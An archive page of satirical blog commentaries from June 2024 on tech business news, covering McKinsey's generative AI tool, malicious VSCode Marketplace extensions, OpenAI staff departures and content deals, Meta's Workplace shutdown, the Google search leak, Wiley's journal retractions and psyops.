What Is McKinsey & Co. Telling Its Clients about AI?

June 12, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Years ago (decades now) I attended a meeting at the firm’s technology headquarters in Bethesda, Maryland. Our carpetland welcomed the sleek, well-fed, and super entitled Booz, Allen & Hamilton professionals to a low-profile meeting to discuss the McKinsey PR problem. I attended because my boss (the head of the technology management group) assumed I would be invisible to the Big Dog BAH winners. He was correct. I was an off-the-New-York radar “manager,” buried in an obscure line item. So there I was. And what was the subject of this periodic meeting? The Harvard Business Review-McKinsey Award. The NY Booz, Allen consultants failed to come up with this idea. McKinsey did. As a result, the technology management group (soon to overtake the lesser MBA side of the business) had to rehash the humiliation of not getting associated with the once-prestigious Harvard University. (The ethics thing, the medical research issue, and the protest response have tarnished the silver Best in Show trophy. Remember?)

image

One of the most capable pilots found himself answering questions from a door-to-door salesman covering his territory somewhere west of Terre Haute. The pilot who has survived but sits amidst a burning experimental aircraft ponders an important question, “How can I explain that the crash was not my fault?” Thanks, MSFT Copilot. Have you ever found yourself in a similar situation? Can you “recall” one?

Now McKinsey has AI data. Actual hands-on, unbillable work product with smart software. Is the story in the Harvard Business Review? A Netflix documentary? A million-view TikTok hit? A “60 Minutes” segment? No, nyet, unh-unh, negative. The story appears in Joe Mansueto’s Fast Company Magazine! Mr. Mansueto founded Morningstar and has expanded his business interests to online publications and giving away some of his billions.

The write up is different from McKinsey’s stentorian pontifications. It is a bit like mining coal in a hard rock dig deep underground. It was a dirty, hard, and ultimately semi-interesting job. Smart software almost broke the McKinsey marvels.

We Spent Nearly a Year Building a Generative AI Tool. These Are the 5 (Hard) Lessons We Learned” presents information which would have been marketing gold for the McKinsey decades ago. But this is 2024, more than 18 months after Microsoft’s OpenAI bomb blast at Davos.

What did McKinsey “learn”?

McKinsey wanted to use AI to “bring together the company’s vast but separate knowledge sources.” Of course, McKinsey’s knowledge is “vast.” How could it be tiny. The firm’s expertise in pharmaceutical efficiency methods exceeds that of many other consulting firms. What’s more important profits or deaths? Answer: I vote for profits, doesn’t everyone except for a few complainers in Eastern Kentucky, West Virginia, and other flyover states.

The big reveal in the write up is that McKinsey & Co learned that its “vast” knowledge is fragmented and locked in Microsoft PowerPoint slides. After the non-billable overhead work, the bright young future corporate leaders discovered that smart software could only figure out about 15 percent of the knowledge payload in a PowerPoint document. With the vast knowledge in PowerPoint, McKinsey learned that smart software was a semi-helpful utility. The smart software was not able to “readily access McKinsey’s knowledge, generate insights, and thus help clients”  or newly-hired consultants do better work, faster, and more economically. Nope.

So what did McKinsey’s band of bright smart software wizards do? The firm coded up its own content parser. How did that home brew software work? The grade is a solid B. The cobbled together system was able to make sense of 85 percent of a PowerPoint document. The other 15 percent gives the new hires something to do until a senior partner intervenes and says, “Get billable or get gone, you very special buttercup.” Non-billable and a future at McKinsey are not like peanut butter and jelly.

How did McKinsey characterize its 12-month journey into the reality of consulting baloney? The answer is a great one. Here it is:

With so many challenges and the need to work in a fundamentally new way, we described ourselves as riding the “struggle bus.” 

Did the McKinsey workers break out into work songs to make the drudgery of deciphering PowerPoints go more pleasantly? I am think about the Coal Miners Boogie by George Davis, West Virginia Mine Disaster by Jean Ritchi, or my personal favorite Black Dust Fever by the Wildwood Valley Boys.

But the workers bringing brain to reality learned five lessons. One can, I assume, pay McKinsey to apply these lessons to a client firm experiencing a mental high from thinking about the payoffs from AI. On the other hand, consider these in this free blog post with my humble interpretation:

  1. Define a shared aspiration. My version: Figure out what you want to do. Get a plan. Regroup if the objective and the method don’t work or make much sense.
  2. Assemble a multi-disciplinary team. My version: Don’t load up on MBAs. Get individuals who can code, analyze content, and tap existing tools to accomplish specific tasks. Include an old geezer partner who can “explain” what McKinsey means when it suggests “managerial evolution.” Skip the ape to MBA cartoons.
  3. Put the user first. My version: Some lesser soul will have to use the system. Make sure the system is usable and actually works. Skip the minimum viable product and get to the quality of the output and the time required to use the system or just doing the work the old-fashioned way.
  4. Tech, learn, repeat. Covert the random walk into a logical and efficient workflow. Running around with one’s hair on fire is not a methodical process nor a good way to produce value.
  5. Measure and manage. My version: Fire those who failed. Come up with some verbal razzle-dazzle and sell the planning and managing work to a client. Do not do this work on overhead for the consultants who are billable.

What does the great reveal by McKinsey tell me. First, the baloney about “saving an average of up to 30 percent of a consultants’ time by streamlining information gathering and synthesis” sounds like the same old, same old pitched by enterprise search vendors for decades. The reality is that online access to information does not save time; it creates more work, particularly when data voids are exposed. Those old dog partners are going to have to talk with young consultants. No smart software is going to eliminate that task no matter how many senior partners want a silver bullet to kill the beast of a group of beginners.

The second “win” is the idea that “insights are better.” Baloney. Flipping through the famous executive memos to a client, reading the reports with the unaesthetic dash points, and looking at the slide decks created by coal miners of knowledge years ago still has to be done… by a human who is sober, motivated, and hungry for peer recognition. Software is not going to have the same thirst for getting a pat on the head and in some cases on another part of the human frame.

The struggle bus is loading up no. Just hire McKinsey to be the driver, the tour guide, and the outfit that collects the fees. One can convert failure into billability. That’s what the Fast Company write up proves. Eleven months and all they got was a ride on the digital equivalent of the Cybertruck which turned out to be much-hyped struggle bus?

AI may ultimately rule the world. For now, it simply humbles the brilliant minds at McKinsey and generates a story for Fast Company. Well, that’s something, isn’t it? Now about spinning that story.

Stephen E Arnold, June 12, 2024

MSFT: Security Is Not Job One. News or Not?

June 11, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

The idea that free and open source software contains digital trap falls is one thing. Poisoned libraries which busy and confident developers snap into their software should not surprise anyone. What I did not expect was the information in “Malicious VSCode Extensions with Millions of Installs Discovered.” The write up in Bleeping Computer reports:

A group of Israeli researchers explored the security of the Visual Studio Code marketplace and managed to “infect” over 100 organizations by trojanizing a copy of the popular ‘Dracula Official theme to include risky code. Further research into the VSCode Marketplace found thousands of extensions with millions of installs.

image

I heard the “Job One” and “Top Priority” assurances before. So far, bad actors keep exploiting vulnerabilities and minimal progress is made. Thanks, MSFT Copilot, definitely close enough for horseshoes.

The write up points out:

Previous reports have highlighted gaps in VSCode’s security, allowing extension and publisher impersonation and extensions that steal developer authentication tokens. There have also been in-the-wild findings that were confirmed to be malicious.

How bad can this be? This be bad. The malicious code can be inserted and happily delivers to a remote server via an HTTPS POST such information as:

the hostname, number of installed extensions, device’s domain name, and the operating system platform

Clever bad actors can do more even if the information they have is the description and code screen shot in the Bleeping Computer article.

Why? You are going to love the answer suggested in the report:

“Unfortunately, traditional endpoint security tools (EDRs) do not detect this activity (as we’ve demonstrated examples of RCE for select organizations during the responsible disclosure process), VSCode is built to read lots of files and execute many commands and create child processes, thus EDRs cannot understand if the activity from VSCode is legit developer activity or a malicious extension.”

That’s special.

The article reports that the research team poked around in the Visual Studio Code Marketplace and discovered:

  • 1,283 items with known malicious code (229 million installs).
  • 8,161 items communicating with hardcoded IP addresses.
  • 1,452 items running unknown executables.
  • 2,304 items using another publisher’s GitHub repo, indicating they are a copycat.

Bleeping Computer says:

Microsoft’s lack of stringent controls and code reviewing mechanisms on the VSCode Marketplace allows threat actors to perform rampant abuse of the platform, with it getting worse as the platform is increasingly used.

Interesting.

Let’s step back. The US Federal government prodded Microsoft to step up its security efforts. The MSFT leadership said, “By golly, we will.”

Several observations are warranted:

  1. I am not sure I am able to believe anything Microsoft says about security
  2. I do not believe a “culture” of security exists within Microsoft. There is a culture, but it is not one which takes security seriously after a butt spanking by the US Federal government and Microsoft Certified Partners who have to work to address their clients issues. (How do I know this? On Wednesday, June 8, 2024, at the TechnoSecurity & Digital Forensics Conference told me, “I have to take a break. The security problems with Microsoft are killing me.”
  3. The “leadership” at Microsoft is loved by Wall Street. However, others fail to respond with hearts and flowers.

Net net: Microsoft poses a grave security threat to government agencies and the users of Microsoft products. Talking with dulcet tones may make some people happy. I think there are others who believe Microsoft wants government contracts. Its employees want an easy life, money, and respect. Would you hire a former Microsoft security professional? This is not a question of trust; this is a question of malfeasance. Smooth talking is the priority, not security.

Stephen E Arnold, June 11, 2024

AI and Ethical Concerns: Sure, When “Ethics” Means Money

June 11, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

It seems workers continue to flee OpenAI over ethical concerns. The Byte reports, “Another OpenAI Researcher Quits, Issuing Cryptic Warning.” Understandably unwilling to disclose details, policy researcher Gretchen Kreuger announced her resignation on X. She did express a few of her concerns in broad strokes:

“We need to do more to improve foundational things, like decision-making processes; accountability; transparency; documentation; policy enforcement; the care with which we use our own technology; and mitigations for impacts on inequality, rights, and the environment.”

Kreuger emphasized these important issues not only affect communities now but also influence who controls the direction of pervasive AI systems in the future. Right now, that control is in the hands of the tech bros running AI firms. Writer Maggie Harrison Dupré notes Krueger’s departure comes as OpenAI is dealing with a couple of scandals. Other high-profile resignations have also occurred in recent months. We are reminded:

“[Recent] departures include that of Ilya Sutskever, who served as OpenAI’s chief scientist, and Jan Leike, a top researcher on the company’s now-dismantled ’Superalignment’ safety team — which, in short, was the division effectively in charge of ensuring that a still-theoretical human-level AI wouldn’t go rogue and kill us all. Or something like that. Sutskever was also a leader within the Superalignment division. And to that end, it feels very notable that all three of these now-ex-OpenAI workers were those who worked on safety and policy initiatives. It’s almost as if, for some reason, they felt as though they were unable to successfully do their job in ensuring the safety and security of OpenAI’s products — part of which, of course, would reasonably include creating pathways for holding leadership accountable for their choices.”

Yes, most of us would find that reasonable. For members of that leadership, though, it seems escaping accountability is a top priority.

Cynthia Murrell, June 11, 2024

Publishers Sign Up for the Great Unknown: Risky, Oh, Yeah

June 7, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

OpenAI is paying for content. Why? Maybe to avoid lawsuits? Maybe to get access to “real” news to try to get ahead of its perceived rivals? Maybe because Sam AI-Man pushes forward while its perceived competitors do weird things like add features, launch services which are lousy, or which have the taste of the bitter fruit of Zuckus nepenthes.

image

Publishers are like beavers. Publishers have to do whatever they can to generate cash. Thanks, MSFT Copilot. Good enough. Not a cartoon and not a single dam, but just like MSFT security good enough, today’s benchmark of excellence.

Journalists Deeply Troubled by OpenAI’s Content Deals with Vox, The Atlantic” is a good example of the angst Sam AI-Man is causing among “real” news outfits and their Fourth Estate professionals. The write up reports:

“Alarmed” writers unions question transparency of AI training deals with ChatGPT maker.

Oh, oh. An echo of Google’s Code Red am I hearing? No, what I hear is the ka-ching of the bank teller’s deposit system as the “owner” of the Fourth Estate professional business process gets Sam AI-Man’s money. Let’s not confuse “real” news with “real” money, shall we? In the current economic climate, money matters. Today it is difficult to sell advertising unless one is a slam dunk monopoly with an ad sales system that is tough to beat. Today it is tough to get those who consume news via a podcast or a public Web site to subscribe. I think that the number I heard for conversions is something like one or two subscribers per 100 visitors on a really good day. Most days are not really good.

“Real” journalists can be unionized. The idea is that their services have to be protected from the lawyers and bean counters who run many high profile publishing outfit. The problem with unions is that these seek to limit what the proprietors can do in a largely unregulated capitalist set up like the one operating within the United States. In a long-forgotten pre-digital era, those in a union dust up in 1921 at Blair Mountain in my favorite state, West Virginia. Today, the union members are more likely to launch social media posts and hook up with a needy lawyering outfit.

Let me be clear. Some of the “real” journalists will find fame as YouTubers, pundits on what’s left of traditional TV or cable news programs, or by writing a book which catches the attention of Netflix. Most, however, will do gig work and migrate to employment adjacent to “real” news. The problem is that in any set of “real” journalists, the top 10 percent will be advantaged. The others may head to favelas, their parent’s basement, or a Sheetz parking lot in my favorite state for some chemical relief. Does that sound scary?

Think about this.

Sam AI-Man, according to the Observer’s story “Sam Altman Says OpenAI Doesn’t Fully Understand How GPT Works Despite Rapid Progress.” These money-focused publishers are signing up for something that not only do they not understand but the fellow who is surfing the crazy wave of smart software does not understand. But taking money and worrying about the future is not something publishing executives in their carpetlands think about. Money in hand is good. Worrying about the future, according to their life coach, is not worth the mental stress. It is go-go in a now-now moment.

I cannot foretell the future. If I could, I would not be an 80-year-old dinobaby sitting in my home office marveling at the downstream consequences of what amounts to a 2024 variant of the DR-LINK technology. I can offer a handful of hypotheses:

  1. “Real” journalists are going to find that publishers cut deals to get cash without thinking of the “real” journalists or the risks inherent in hopping in a small cabin with Sam AI-Man for a voyage in the unknown.
  2. Money and cost reductions will fuel selling information to Sam AI-Man and any other Big Tech outfit which comes calling with a check book. Money now is better than looking at a graph of advertising sales over the last five years. Money trumps “real” journalists’ complaints when they are offered part-time work or an opportunity to find their future elsewhere.
  3. Publishing outfits have never been technology adept, and I think that engineered blindness is now built into the companies’ management processes. Change is going to make publishing an interesting business. That’s good for consultants and bankruptcy specialists. It will not be so good for those who do not have golden parachutes or platinum flying cars.

Net net: What are the options for the “real” journalists’ unions? Lawyers, maybe. Social media posts. Absolutely. Will these prevent publishers from doing what publishers have to do? Nope.

Stephen E Arnold, June 7, 2024

Meta Deletes Workplace. Why? AI!

June 7, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Workplace was Meta’s attempt to jump into the office-productivity ring and face off against the likes of Slack and MS Teams. It did not fare well. Yahoo Finance shares the brief write-up, “Meta Is Shuttering Workplace, Its Enterprise Version of Facebook.” The company is spinning the decision as a shift to bigger and better things. Bloomberg’s Kurt Wagner cites reporting from TechCrunch as she writes:

“The service operated much like the original Facebook social network, but let people have separate accounts for their work interactions. Workplace had as many as 7 million total paying subscribers in May 2021. … Meta once had ambitious plans for Workplace, and viewed it as a way to make money through subscriptions as well as a chance to extend Facebook’s reach by infusing the product into work and office settings. At one point, Meta touted a list of high-profile customers, including Starbucks Corp., Walmart Inc. and Spotify Technology SA. The company will continue to focus on workplace-related products, a spokesperson said, but in other areas, such as the metaverse by building features for the company’s Quest VR headsets.”

The Meta spokesperson repeated the emphasis on those future products, also stating:

“We are discontinuing Workplace from Meta so we can focus on building AI and metaverse technologies that we believe will fundamentally reshape the way we work.”

Meta will continue to use Workplace internally, but everyone else has until the end of August 2025 before the service ends. Meta plans to keep user data accessible until the end of May 2026. The company also pledges to help users shift to Zoom’s Workvivo platform. What, no forced migration into the Metaverse and their proprietary headsets? Not yet, anyway.

Cynthia Murrell, June 7, 2024

OpenAI: Deals with Apple and Microsoft Squeeze the Google

June 6, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Do you remember your high school biology class? You may have had a lab partner, preferably a person with dexterity and a steady hand. Dissecting creatures and having recognizable parts was important. Otherwise, how could one identify the components when everything was a glutinous mash up of white, red, pink, gray, and — yes — even green?

That’s how I interpret the OpenAI deals the company has with Apple and Microsoft. What are these two large, cash-rich, revenue hungry companies going to do? The illustration suggest that the two was to corral Googzilla, put the beastie in a stupor, and then take the creature apart.

image

The little Googzilla is in the lab. Two wizards are going to try to take the creature apart. One of the bio-data operators is holding tweezers to grab the beastie and place it on an adhesive gel pad. The other is balancing the creature to reassure it that it may once again be allowed to roam free in a digital Roatan. The bio-data experts may have another idea. Thanks, MSFT. Did you know you are the character with the tweezers?

Well, maybe the biology lab metaphor is not appropriate. Oh, heck, I am going to stick with the trope. Microsoft has rammed Copilot and its other AI deals in front of Windows users world wide. Now Apple, late to the AI game, went to the AI dance hall and picked the star-crossed OpenAI as a service it would take to the smart software recital.

If you want to get some color about Apple and OpenAI, navigate to “Apple and OpenAI Allegedly Reach Deal to Bring ChatGPT Functionality to iOS 18.”

I want to focus on what happens before the lab partners try to chop up the little Googzilla.

Here are the steps:

  1. Use tweezers to grab the beastie
  2. Squeeze the tweezers to prevent the beastie from escaping to the darkness under the lab cabinets
  3. Gently lift the beastie
  4. Place the beastie on the adhesive gel.

I will skip the part of process which involves anesthetizing the beastie and beginning the in vivo procedures. Just use your imagination.

Now back to the four steps. My view is that neither Apple nor Microsoft will actively cooperate to make life difficult for the baby Googzilla, which represents a fledgling smart software activity. Here’s my vision.

Apple will do what Apple does, just with OpenAI and ChatGPT. At some point, Apple, which is a kind and gentle outfit, may not chop off Googzilla’s foot. Apple may offer the beastie a reprieve. After all, Apple knows Google will pay big bucks to be the default search engine for Safari. The foot remains attached, but there is some shame attached at being number two. No first prize, just a runner up: How is that for a creature who views itself as the world’s smartest, slickest, most wonderfulest entity? Answer: Bad.

The squeezing will be uncomfortable. But what can the beastie do. The elevation causes the beastie to become lightheaded. Its decision making capability, already suspect, becomes more addled and unpredictable.

Then the adhesive gel. Mobility is impaired. Fear causes the beastie’s heart to pound. The beastie becomes woozy. The beastie is about to wonder if it will survive.

To sum up the situation: The Google is hampered by:

  1. A competitor in AI which has cut deals that restrict Google to some degree
  2. The parties to the OpenAI deal are out for revenue which is thicker than blood
  3. Google has demonstrated a loss of some management capability and that may deteriorate at a more rapid pace.

Today’s world may be governed by techno-feudalists, and we are going to get a glimpse of what happens when a couple of these outfits tag team a green beastie. This will be an interesting situation to monitor.

Stephen E Arnold, June 6, 2024

Large Dictators. Name the Largest

June 6, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

I read “Social Media Bosses Are the Largest Dictators, Says Nobel Peace Prize Winner.” I immediately thought of “fat” dictators; for example, Benito Mussolini, but I may have him mixed up with Charles Laughton in “Mutiny on the Bounty.”

image

A mother is trying to implement the “keep your kids off social media” recommendation. Thanks, MSFT Copilot. Good enough.

I think the idea intended is something along the lines of “unregulated companies and their CEOs have more money and power than some countries. These CEOs act like dictators on a par with Julius Caesar. Brutus and friends took out Julius, but the heads of technopolies are indifferent to laws, social norms, and the limp limbs of ethical behavior.”

That’s a lot of words. Ergo: Largest dictators is close enough for horseshoes. It is 2024, and no one wants old-fashioned ideas like appropriate business activities to get in the way of making money and selling online advertising.

The write up shares the quaint ideas of a Noble Peace Prize winner. Here are the main points about social media and technology by someone who is interested in peace:

  1. Tech bros are dictators with considerable power over information and ideas
  2. Tech bros manipulate culture, language, and behavior
  3. The companies these dictators runs “change the way we feel” and “change the way we see the world and change the way we act”

I found this statement from the article suggestive:

“In the Philippines, it was rich versus poor. In the United States, it’s race,” she said. “Black Lives Matter … was bombarded on both sides by Russian propaganda. And the goal was not to make people believe one thing. The goal was to burst this wide open to create chaos.”  The way tech companies are “inciting polarization, inciting fear and anger and hatred” changes us “at a personal level, a societal level”, she said.

What’s the fix? A speech? Two actions are needed:

  1. Dump the protection afforded the dictators by the 1996 Communications Decency Act
  2. Prevent children from using social media.

Now it is time for a reality check. Changing the Communications Decency Act will take some time. Some advocates have been chasing this legal Loch Ness monster for years. The US system is sensitive to “laws” and lobbyists. Change is slow and regulations are often drafted by lobbyists. Therefore, don’t hold your breath on revising the CDA by the end of the week.

Second, go to a family-oriented restaurant in the US. How many of the children have mobile phones? Now, be a change expert, and try to get the kids at a nearby table to give you their mobile devices. Let me know how that works out, please.

Net net: The Peace Prize winner’s ideas are interesting. That’s about it. And the fat dictators? Keto diets and chemicals do the trick.

Stephen E Arnold, June 6, 2024

The Leak: One Nothing Burger, Please

June 5, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Everywhere I look I see write ups about the great Google leak. One example is the poohbah publication The Verge and its story “The Biggest Findings in the Google Search Leak.” From the git-go there is information which reveals something many people know about the Google. It does not explain what it does or its intentions. It just does stuff and then fancy dances around what the company is actually doing. How long has this been going on? Since the litigation about Google’s inspiring encounter with the Yahoo, Overture, GoTo pay-to-play advertising model. In one of my monographs about Google I created this illustration to explain how the Google technology works.

image

Here’s what I wrote in Google: The Calculating Predator (Infonortics, UK, 2007):

Like a skilled magician, a good stage presence and a bit of misdirection focus attention where Google wants it.

The “leak” is fodder for search engine optimization professionals who unwittingly make the case for just buying advertising. But the leak delivers one useful insight: Google does not tell what it does in plain English. Some call it prevarication; I call it part of the overall strategy of the firm. The philosophy is one manifestation of the idea that “users” don’t need to know anything. “Users” are there to allow Google to sell advertising, broker advertising, and automate advertising. Period. This is the ethos of the high school science club which knows everything. Obviously.

The cited article revealing the biggest findings offers these insights. Please, sit down. I don’t want to be responsible for causing anyone bodily harm.

First snippet:

Google spokespeople have repeatedly denied that user clicks factor into ranking websites, for example — but the leaked documents make note of several types of clicks users make and indicate they feed into ranking pages in search. Testimony from the antitrust suit by the US Department of Justice previously revealed a ranking factor called Navboost that uses searchers’ clicks to elevate content in search.

Are you still breathing. Yep, Google pays attention to clicks. Yes, that’s one of the pay-to-play requirements: Show data to advertisers and get those SEO people acting as an advertising pre-sales service. When SEO fails, buy ads. Yep, earth shattering.

5 31 nothing burger

An actual expert in online search examines the information from the “leak” and realizes the data for what they are: Out of context information from a mysterious source. Thanks MidJourney. Other smart services could not deliver a nothing burger. Yours is good enough.

How about this stunning insight:

Google Search representatives have said that they don’t use anything from Chrome for ranking, but the leaked documents suggest that may not be true.

Why would Google spend money to build a surveillance enabled software system? For fun? No, not for fun. Browsers funnel data back to a command-and-control center. The data are analyzed and nuggets used to generate revenue from advertising. This is a surprise. Microsoft got in trouble for browser bundling, but since the Microsoft legal dust up, regulators have taken a kinder, gentler approach to the Google.

Are there more big findings?

Yes, we now know what a digital nothing burger looks like. We already knew what falsehoods look like. SEO professionals are shocked. What’s that say for the unwitting Google pre-advertising purchase advocates?

Stephen E Arnold, June 5, 2024

Lunch at a Big Time Publisher: Humble Pie and Sour Words

June 4, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Years ago I did some work for a big time New York City publisher. The firm employed people who used words like “fungible” and “synergy” when talking with me. I took the time to read an article with this title: “So Much for Peer Review — Wiley Shuts Down 19 Science Journals and Retracts 11,000 Gobbledygook Papers.” Was this the staid, conservative, and big vocabulary?

Yep.

The essay is little more than a wrapper for a Wall Street Journal story with the title “Flood of Fake Science Forces Multiple Journal Closures Tainted by Fraud.” I quite like that title, particularly the operative word “fraud.” What in the world is going on?

The write up explains:

Wiley — a mega publisher of science articles has admitted that 19 journals are so worthless, thanks to potential fraud, that they have to close them down. And the industry is now developing AI tools to catch the AI fakes (makes you feel all warm inside?)

image

A group of publishing executives becomes the focal point of a Midtown lunch in an upscale restaurant. The titans of publishing are complaining about the taste of humble pie and user secret NYAC gestures to express their disapproval. Thanks, MSFT Copilot. Your security expertise may warrant a special banquet too.

The information in the cited article contains some tasty nuggets which complement humble pie in my opinion; for instance:

  • The shut down of the junk food publications has required two years. If Sillycon Valley outfits can fire thousands via email or Zoom, “Why are those uptown shoes being dragged?” I asked myself.
  • Other high-end publishers have been doing the same thing. Sadly there are no names.
  • The bogus papers included something called a “AI gobbledygook sandwich.” Interesting. Human reviews who are experts could not recognize the vernacular of academic and research fraudsters.
  • Some in Australia think that the credibility of universities might be compromised. Oh, come now. Just because the president of Stanford had to search for his future elsewhere after some intellectual fancy dancing and the head of the Harvard ethic department demonstrated allegedly sci-fi ethics in published research, what’s the problem? Don’t students just get As and Bs. Professors are engaged in research, chasing consulting gigs, and ginning up grant money. Actual research? Oh, come now.
  • Academic journals are or were a $30 billion dollar industry.

Observations are warranted:

  • In today’s datasphere, I am not surprised. Scams, frauds, and cheats seems to be as common as ants at a picnic. A cultural shift has occurred. Cheating has become the norm.
  • Will the online databases, produced by some professional publishers and commercial database companies, be updated to remove or at least flag the baloney? Probably not. That costs money. Spending money is not a modern publishing CEO’s favorite activity. (Hence the two-year draw down of the fake information at the publishing house identified in the cited write up.)
  • How many people have died or been put out of work because of specious research data? I am not holding my breath for the peer reviewed journals to provide this information.

Net net: Humiliating and a shame. Quite a cultural mismatch between what some publishers say and this alleged what the firm ordered from the deli. I thought the outfit had a knowledge-based reason to tell me that it takes the high road. It seems that on that road, there are places where a bad humble pie is served.

Stephen E Arnold, June 4, 2024

Spot a Psyop Lately?

June 3, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Psyops or psychological operations is also known as psychological warfare. It’s defines as actions used to weaken an enemy’s morale. Psyops can range from simple propaganda poster to a powerful government campaign. According to Annalee Newitz on her Hypothesis Buttondown blog, psyops are everywhere and she explains: “How To Recognize A Psyop In Three Easy Steps.”

Newitz smartly condenses the history of American psyops into a paragraph: it’s a mixture of pulp fiction tropes, advertising techniques, and pop psychology. In the twentieth century, US military harnessed these techniques to make messages to hurt, demean, and distract people. Unlike weapons, psyops can be avoided with a little bit of critical thinking.

The first step is to pay attention when people claim something is “anti-American.” The term “anti-American” can be interpreted in many ways, but it comes down to media saying one group of people (foreign, skin color, sexual orientation, etc.) is against the American way of life.

The second step is spreading lies with hints of truth. Newitz advises to read psychological warfare military manuals and uses an example of leaflets the Japanese dropped on US soldiers in the Philippines. The leaflets warned the soldiers about venomous snakes in jungles and they were signed by with “US Army.” Soldiers were told the leaflets were false, but it made them believe there were coverups:

“Psyops-level lies are designed to destabilize an enemy, to make them doubt themselves and their compatriots, and to convince them that their country’s institutions are untrustworthy. When psyops enter culture wars, you start to see lies structured like this snake “warning.” They don’t just misrepresent a specific situation; they aim to undermine an entire system of beliefs.”

The third step is the easiest to recognize and the most extreme: you can’t communicate with anyone who says you should be dead. Anyone who believes you should be dead is beyond rational thought. Her advice is to ignore it and not engage.

Another way to recognize psyops tactics is to question everything. Thinking isn’t difficult, but thinking critically takes practice.

Whitney Grace, June 3, 2024

« Previous PageNext Page »

  • Archives

  • Recent Posts

  • Meta